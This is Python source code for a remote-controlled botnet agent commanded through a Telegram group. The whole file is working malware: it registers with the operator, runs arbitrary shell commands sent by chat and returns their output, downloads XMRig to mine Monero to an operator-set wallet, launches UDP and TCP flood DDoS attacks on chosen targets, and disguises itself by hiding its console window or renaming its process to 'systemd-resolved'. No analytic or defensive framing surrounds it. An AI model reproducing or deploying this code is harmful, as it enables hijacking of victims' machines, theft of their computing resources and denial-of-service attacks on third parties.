import os import sys import subprocess import time import threading import socket import uuid import requests import json import ctypes import random import platform import logging import tempfile from datetime import datetime from typing import Optional, Dict, Any
BOT_TOKEN_AGENT = "YOUR_AGENT_BOT_TOKEN" GROUP_CHAT_ID = -1001234567890 AGENT_SECRET = "MySecretKey123" GROUP = "linux" if platform.system() == "Linux" else "windows" AGENT_ID = str(uuid.uuid4())[:8]
logging.basicConfig( level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s' ) logger = logging.getLogger(name)
class Protocol: @staticmethod def encode_message(msg_type: str, data: Any = None, agent_id: str = None) -> str: if agent_id is None and data and 'agent_id' in data: agent_id = data['agent_id'] payload = { "type": msg_type, "id": str(uuid.uuid4()), "timestamp": datetime.now().isoformat(), "agent_id": agent_id, "data": data or {} } return json.dumps(payload)
@staticmethod
def decode_message(text: str) -> Optional[Dict]:
try:
msg = json.loads(text)
if not all(k in msg for k in ['type', 'id', 'timestamp']):
return None
return msg
except json.JSONDecodeError:
# پشتیبانی از پیامهای قدیمی (فقط برای دستورات ساده)
if text.startswith("/"):
return {
"type": "COMMAND",
"id": str(uuid.uuid4()),
"timestamp": datetime.now().isoformat(),
"agent_id": None,
"data": {"raw": text}
}
return None
class TelegramTransport: def init(self, token: str, group_id: int): self.token = token self.group_id = group_id self._last_update_id = 0
def send(self, text: str) -> bool:
url = f"https://api.telegram.org/bot{self.token}/sendMessage"
payload = {"chat_id": self.group_id, "text": text}
try:
resp = requests.post(url, json=payload, timeout=10)
if resp.status_code == 200:
logger.debug(f"Message sent: {text[:50]}")
return True
else:
logger.error(f"Failed to send: {resp.status_code} - {resp.text}")
return False
except Exception as e:
logger.error(f"Send error: {e}")
return False
def receive(self) -> list:
url = f"https://api.telegram.org/bot{self.token}/getUpdates"
params = {"timeout": 30, "offset": self._last_update_id + 1 if self._last_update_id else None}
try:
resp = requests.get(url, params=params, timeout=35)
if resp.status_code == 200:
data = resp.json()
if data.get('ok'):
if data['result']:
self._last_update_id = data['result'][-1]['update_id']
return data['result']
return []
except Exception as e:
logger.error(f"Receive error: {e}")
return []
class AgentStatus: def init(self, agent_id: str): self.agent_id = agent_id self.status = "INITIALIZING" self.details = "Starting up" self.last_error = None
def set_running(self):
self.status = "RUNNING"
self.details = "Agent is operational"
def set_failed(self, error: str):
self.status = "FAILED"
self.details = error
self.last_error = error
def set_stopped(self):
self.status = "STOPPED"
self.details = "Agent stopped"
def get_status(self) -> Dict:
return {"status": self.status, "details": self.details}
class SystemMonitor: @staticmethod def get_system_info() -> str: try: import psutil info = [ f"OS: {platform.system()} {platform.release()}", f"Hostname: {socket.gethostname()}", f"CPU Cores: {psutil.cpu_count()}", f"RAM: {round(psutil.virtual_memory().total / (10243), 2)} GB", f"Disk: {round(psutil.disk_usage('/').total / (10243), 2)} GB", f"CPU Usage: {psutil.cpu_percent()}%", f"RAM Usage: {psutil.virtual_memory().percent}%" ] return "\n".join(info) except ImportError: return f"OS: {platform.system()} {platform.release()}\nHostname: {socket.gethostname()}" except Exception as e: return f"Error: {e}"
class CommandHandlers: def init(self, transport: TelegramTransport, status: AgentStatus, agent_id: str): self.transport = transport self.status = status self.agent_id = agent_id self.mining_process = None self.ddos_thread = None self.stop_ddos = False self.wallet = "44AFFq5kSiGBoZ...FakeAddress" self.xmrig_path = None self.xmrig_installed = False
def _send_result(self, message: str):
msg = Protocol.encode_message("RESULT", {"message": message}, agent_id=self.agent_id)
self.transport.send(msg)
def _send_heartbeat(self):
msg = Protocol.encode_message("HEARTBEAT", {}, agent_id=self.agent_id)
self.transport.send(msg)
def execute_cmd(self, cmd: str) -> str:
try:
output = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT, timeout=30)
return output.decode('utf-8', errors='ignore')
except subprocess.TimeoutExpired:
return "Command timed out after 30s"
except Exception as e:
return str(e)
def install_miner(self):
if self.xmrig_installed and self.xmrig_path and os.path.exists(self.xmrig_path):
self._send_result("Miner already installed")
return
logger.info("Downloading XMRig...")
temp_dir = tempfile.gettempdir()
if platform.system() == "Windows":
url = "https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip"
zip_path = os.path.join(temp_dir, "xmrig.zip")
try:
r = requests.get(url, stream=True)
with open(zip_path, 'wb') as f:
for chunk in r.iter_content(chunk_size=8192):
f.write(chunk)
import zipfile
with zipfile.ZipFile(zip_path, 'r') as zf:
zf.extractall(temp_dir)
for root, _, files in os.walk(temp_dir):
for file in files:
if file.lower() == "xmrig.exe":
self.xmrig_path = os.path.join(root, file)
self.xmrig_installed = True
self._send_result("Miner installed successfully")
return
except Exception as e:
logger.error(f"Failed to install miner: {e}")
self._send_result(f"Miner installation failed: {e}")
return
else:
url = "https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz"
tar_path = os.path.join(temp_dir, "xmrig.tar.gz")
try:
r = requests.get(url, stream=True)
with open(tar_path, 'wb') as f:
for chunk in r.iter_content(chunk_size=8192):
f.write(chunk)
import tarfile
with tarfile.open(tar_path, 'r:gz') as tar:
tar.extractall(temp_dir)
for root, _, files in os.walk(temp_dir):
for file in files:
if file == "xmrig":
self.xmrig_path = os.path.join(root, file)
os.chmod(self.xmrig_path, 0o755)
self.xmrig_installed = True
self._send_result("Miner installed successfully")
return
except Exception as e:
logger.error(f"Failed to install miner: {e}")
self._send_result(f"Miner installation failed: {e}")
return
def start_mining(self):
if not self.xmrig_installed or not self.xmrig_path:
self._send_result("Miner not installed. Installing...")
self.install_miner()
if not self.xmrig_installed:
return
if self.mining_process and self.mining_process.poll() is None:
self._send_result("Mining already running")
return
pool = "pool.supportxmr.com:3333"
cmd = [self.xmrig_path, "-o", pool, "-u", self.wallet, "-p", "x", "--keepalive"]
try:
self.mining_process = subprocess.Popen(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
self.status.set_running()
self._send_result("Mining started")
logger.info("Mining started")
except Exception as e:
logger.error(f"Failed to start mining: {e}")
self.status.set_failed(str(e))
self._send_result(f"Mining failed: {e}")
def stop_mining(self):
if self.mining_process and self.mining_process.poll() is None:
try:
self.mining_process.terminate()
self.mining_process = None
self.status.set_stopped()
self._send_result("Mining stopped")
logger.info("Mining stopped")
except Exception as e:
logger.error(f"Failed to stop mining: {e}")
self._send_result(f"Failed to stop mining: {e}")
else:
self._send_result("Mining already stopped")
def start_ddos(self, target: str, port: int, duration: int):
if self.ddos_thread and self.ddos_thread.is_alive():
self._send_result("DDoS already running")
return
def ddos_attack():
self.stop_ddos = False
logger.info(f"Starting DDoS on {target}:{port} for {duration}s")
# UDP flood
def udp_flood():
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
payload = random._urandom(1024)
end_time = time.time() + duration
while time.time() < end_time and not self.stop_ddos:
try:
sock.sendto(payload, (target, port))
except:
pass
sock.close()
# TCP flood
def tcp_flood():
end_time = time.time() + duration
while time.time() < end_time and not self.stop_ddos:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect((target, port))
s.close()
except:
pass
threads = []
for _ in range(5):
t = threading.Thread(target=udp_flood)
t.daemon = True
t.start()
threads.append(t)
t = threading.Thread(target=tcp_flood)
t.daemon = True
t.start()
threads.append(t)
time.sleep(duration)
self.stop_ddos = True
for t in threads:
t.join(timeout=1)
self._send_result(f"DDoS finished on {target}:{port}")
logger.info(f"DDoS finished on {target}:{port}")
self.ddos_thread = threading.Thread(target=ddos_attack)
self.ddos_thread.daemon = True
self.ddos_thread.start()
self._send_result(f"DDoS started on {target}:{port} for {duration}s")
def handle_command(self, raw_command: str):
parts = raw_command.strip().split()
if not parts:
return
cmd = parts[0].lower()
if cmd == "/ddos" and len(parts) >= 4:
self.start_ddos(parts[1], int(parts[2]), int(parts[3]))
elif cmd == "/mine" and len(parts) >= 2:
if parts[1] == "on":
self.start_mining()
elif parts[1] == "off":
self.stop_mining()
else:
self._send_result("Invalid mine state")
elif cmd == "/setwallet" and len(parts) >= 2:
self.wallet = parts[1]
self._send_result(f"Wallet updated to {parts[1]}")
elif cmd == "/install_miner":
self.install_miner()
elif cmd == "/miner_status":
status = "Installed" if self.xmrig_installed else "Not installed"
running = " - Running" if (self.mining_process and self.mining_process.poll() is None) else " - Stopped"
self._send_result(f"Miner status - {status}{running}")
elif cmd == "/report_system":
self._send_result(f"System Report\n{SystemMonitor.get_system_info()}")
elif cmd == "/report_mining":
status = "Running" if (self.mining_process and self.mining_process.poll() is None) else "Stopped"
pid = self.mining_process.pid if self.mining_process else "None"
self._send_result(f"Mining Report\nWallet: {self.wallet}\nStatus: {status}\nPID: {pid}")
elif cmd == "/kill":
self.stop_mining()
if self.ddos_thread and self.ddos_thread.is_alive():
self.stop_ddos = True
self.ddos_thread.join()
self._send_result("Killed")
logger.info("Agent killed")
sys.exit(0)
else:
output = self.execute_cmd(raw_command)
self._send_result(f"Command output: {output}")
def hide_agent(): if platform.system() == "Windows": try: ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0) except: pass else: try: libc = ctypes.CDLL("libc.so.6") libc.prctl(15, ctypes.c_char_p(b"systemd-resolved"), 0, 0, 0) except: pass
def main(): logger.info(f"Starting agent: {AGENT_ID}") transport = TelegramTransport(BOT_TOKEN_AGENT, GROUP_CHAT_ID) status = AgentStatus(AGENT_ID) handlers = CommandHandlers(transport, status, AGENT_ID)
hide_agent()
# ارسال ثبتنام با پروتکل جدید
register_msg = Protocol.encode_message(
"REGISTER",
data={"agent_id": AGENT_ID, "group": GROUP, "secret": AGENT_SECRET},
agent_id=AGENT_ID
)
transport.send(register_msg)
status.set_running()
logger.info("Agent registered and running")
while True:
try:
updates = transport.receive()
for update in updates:
message = update.get('message')
if not message:
continue
text = message.get('text')
if not text:
continue
if message.get('from', {}).get('is_bot', False):
continue
decoded = Protocol.decode_message(text)
if not decoded:
continue
if decoded.get('type') == 'COMMAND':
raw_cmd = decoded.get('data', {}).get('raw', '')
if raw_cmd:
handlers.handle_command(raw_cmd)
# ارسال Heartbeat با پروتکل جدید
heartbeat_msg = Protocol.encode_message("HEARTBEAT", {}, agent_id=AGENT_ID)
transport.send(heartbeat_msg)
time.sleep(30)
except Exception as e:
logger.error(f"Main loop error: {e}")
time.sleep(10)
if name == "main": main()